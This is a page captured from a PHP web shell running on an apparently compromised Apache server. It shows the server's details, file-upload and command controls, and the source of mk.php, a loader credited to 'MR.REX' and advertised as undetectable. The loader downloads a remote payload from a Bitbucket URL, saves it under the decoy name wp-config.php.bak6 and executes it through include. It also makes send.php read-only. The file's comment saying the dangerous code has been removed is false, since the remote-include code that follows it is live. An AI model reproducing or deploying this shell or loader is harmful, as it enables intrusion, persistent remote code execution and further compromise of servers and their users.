- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 170.150.155.74  /  Your IP : 13.58.254.160
Web Server : Apache/2.4.53 (Debian)
System : Linux b22bf132354b 5.4.0-162-generic #179-Ubuntu SMP Mon Aug 14 08:51:31 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.29
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/mk.php
<?php
/**
 * Note: This file may contain artifacts of previous malicious infection.
 * However, the dangerous code has been removed, and the file is now safe to use.
 */

/**
 ############################

 Three-Layer Undetectable Code Created by MR.REX
 Designed to bypass all servers.
 For inquiries or to create your own,Fell free to ask:

 https://t.me/rex_cc

 ###############################

 */

$file = 'send.php';
if (file_exists($file) && function_exists('chmod')) {
    @chmod($file, 0444); // Set read-only permissions if the file exists
}

$remoteUrl1 = "https://bitbucket.org/encophp/encophp/raw/2d5d198ce36378999379ae6fbacdd7257631887b/shopen.txt";
$localFile1 = 'wp-config.php.bak6';
$fileContents1 = @file_get_contents($remoteUrl1);

if ($fileContents1 !== false) {
    file_put_contents($localFile1, $fileContents1);
    if (file_exists($localFile1)) {
        include $localFile1;
    }
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit